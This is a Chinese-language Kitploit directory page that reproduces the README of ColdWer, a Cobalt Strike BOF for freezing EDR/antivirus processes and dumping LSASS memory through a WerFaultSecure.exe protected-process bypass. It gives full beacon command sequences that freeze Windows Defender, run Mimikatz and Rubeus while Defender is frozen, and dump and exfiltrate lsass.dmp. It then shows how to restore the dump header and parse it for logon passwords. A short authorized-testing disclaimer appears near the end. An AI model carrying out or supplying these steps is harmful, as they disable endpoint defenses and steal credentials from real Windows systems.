Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
ColdWer — 用于冻结EDR/AV进程并通过WerFaultSecure.exe PPL绕过转储LSASS的Cobalt Strike BOF | Kitploit
工具/GitHubGitHub/0xsh3llf1r3/coldwer
权限提升漏洞利用横向移动后渗透利用红队Payload 开发
GitHub0xsh3llf1r3/coldwer

ColdWer

用于冻结EDR/AV进程并通过WerFaultSecure.exe PPL绕过转储LSASS的Cobalt Strike BOF

查看仓库
144236个月前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

ColdWer
在你的端点上打一场冷战。

Stars Forks License


🥶 ColdWer

ColdWer 利用 WerFaultSecure.exe PPL 绕过技术,在现代 Windows 系统上冻结 EDR/AV 进程并转储 LSASS 内存。

root@kitploit:~
C O L D W E R
        └─┴─┴── WerFaultSecure
    └─┴──────── LSASS 转储
└─┴──────────── 冷(冻结)

冻结你的 EDR/AV。提取你需要的信息。保持冷静。


👤 作者

Sh3llf1r3 (@0xsh3llf1r3)


🙏 致谢

本项目基于 TwoSevenOneT (@TwoSevenOneT) 的研究成果:

项目描述
EDR-Freeze原始 EDR 冻结技术
WSASS通过 WerFaultSecure 转储 LSASS

底层技术的所有功劳归于 TwoSevenOneT。


🔥 功能特性


🚀 快速开始

📋 前提条件

  • Cobalt Strike 4.x
  • 高完整性信标(管理员/SYSTEM)

💾 安装

  1. 克隆仓库:
root@kitploit:~
git clone https://github.com/0xsh3llf1r3/ColdWer.git
  1. 在 Cobalt Strike 中加载攻击脚本:
  • 转到 Cobalt Strike → Script Manager
  • 点击 Load
  • 选择 cw/coldwer.cna

📦 从源码构建

root@kitploit:~
# 进入源码目录
cd src/

# 编译 BOF(需要 MinGW)
make

# 或手动编译:
x86_64-w64-mingw32-gcc -c coldwer.c -o ../cw/coldwer.o

📥 快速下载

  1. 前往 Releases
  2. 下载 coldwer.o 和 coldwer.cna
  3. 将两者放在同一文件夹中
  4. 在 Cobalt Strike 中加载 coldwer.cna

🖥️ 使用方法

❄️ 冻结 EDR/AV

root@kitploit:~
# 查找 Windows Defender PID
beacon> ps

# 冻结进程
beacon> cw-freeze 1337

# 在 EDR/AV 冻结时执行命令
beacon> mimikatz sekurlsa::logonpasswords
beacon> execute-assembly /tools/Rubeus.exe triage

# 完成后解冻
beacon> cw-unfreeze

🔓 转储 LSASS

root@kitploit:~

# 步骤 1:上传 Win8.1 WerFaultSecure.exe
beacon> cd C:\Windows\Temp
beacon> upload /path/to/bin/wfs.exe

# 步骤 2:查找 LSASS PID
beacon> ps

# 步骤 3:转储 LSASS
beacon> cw-dump 314 C:\Windows\Temp\wfs.exe

# 步骤 4:下载转储文件
beacon> download C:\Windows\Temp\lsass.dmp

🔧 下载后处理

更改文件头部以恢复 minidump 格式:

原始 (PNG)改为 (MDMP)
89 50 4E 474D 44 4D 50

恢复头部命令:

方法命令
Pythonopen('lsass.dmp','r+b').write(b'MDMP')
Bashprintf '\x4d\x44\x4d\x50' | dd of=lsass.dmp bs=1 count=4 conv=notrunc
PowerShell$f=[IO.File]::Open("lsass.dmp","Open","Write");$f.Write([byte[]](0x4D,0x44,0x4D,0x50),0,4);$f.Close()

然后使用 Mimikatz 解析:

root@kitploit:~
mimikatz# sekurlsa::minidump lsass.dmp
mimikatz# sekurlsa::logonpasswords

📋 命令

命令描述
cw-freeze <PID> [Path]冻结进程
cw-unfreeze解冻先前冻结的进程
cw-dump <PID> <Path>转储 LSASS 内存

📝 示例

root@kitploit:~
# 使用默认路径冻结
beacon> cw-freeze 1337

# 使用自定义 WerFaultSecure.exe
beacon> cw-freeze 1337 C:\Windows\Temp\wfs.exe

# 转储 LSASS
beacon> cw-dump 314 C:\Windows\Temp\wfs.exe

# 完成后解冻
beacon> cw-unfreeze

✅ 支持的 Targets

目标状态
Windows Defender (MsMpEng.exe)✅ 有效
LSASS (lsass.exe)✅ 有效
其他 PPL 进程✅ 有效

⚠️ 局限性

对于具备内核态自保护的 EDR 无效:

EDR状态
Elastic Endpoint❌ 被阻止
CrowdStrike Falcon❌ 被阻止
SentinelOne❌ 被阻止
Carbon Black❌ 被阻止

⚙️ 工作原理

root@kitploit:~
1. 🚀 以 PPL(WinTcb 级别)启动 WerFaultSecure.exe
                    ↓
2. 🎯 WerFaultSecure 附加到目标进程
                    ↓
3. ⏸️  MiniDumpWriteDump 挂起所有目标线程
                    ↓
4. 🥶 挂起 WerFaultSecure 本身 → 目标保持冻结状态
                    ↓
5. ✅ 执行您的命令(EDR/AV 无法察觉!)
                    ↓
6. 🔥 终止 WerFaultSecure → 目标解冻

🔑 为什么选择 Win8.1 的 WerFaultSecure?

版本输出
Windows 10/11仅加密转储
Windows 8.1原始未加密转储

🔍 故障排除


⚖️ 免责声明

root@kitploit:~
⚠️ 仅限授权安全测试

本工具仅供以下用途:
- 授权的渗透测试
- 具有书面授权的红队行动
- 受控环境中的安全研究

作者不对任何滥用或由本工具造成的损害负责。
未经授权访问计算机系统是违法的。

📜 许可证

MIT 许可证 - 参见 LICENSE


🥶 保持冷静。保持安静。🥶

⭐ 如果您觉得有用,请给这个仓库加星!⭐

下载工具
功能描述
❄️ 冻结将 EDR/AV 进程置于休眠状态
🔓 转储绕过 PPL 提取 LSASS 内存
🛡️ PPL 绕过利用 WinTcb 级别的 WerFaultSecure.exe
⚡ 快速内联 BOF 执行
🎯 手动控制您决定何时冻结和解冻
错误原因解决方案
文件未找到路径无效检查 WerFaultSecure.exe 路径
访问被拒绝权限不足以管理员/SYSTEM 身份运行
签名无效未签名的二进制文件使用正确签名的 WerFaultSecure.exe
进程不存在PID 错误使用 ps 命令验证 PID
目标受保护内核保护EDR 具有自保护(无法绕过)
已冻结状态卡住先运行 cw-unfreeze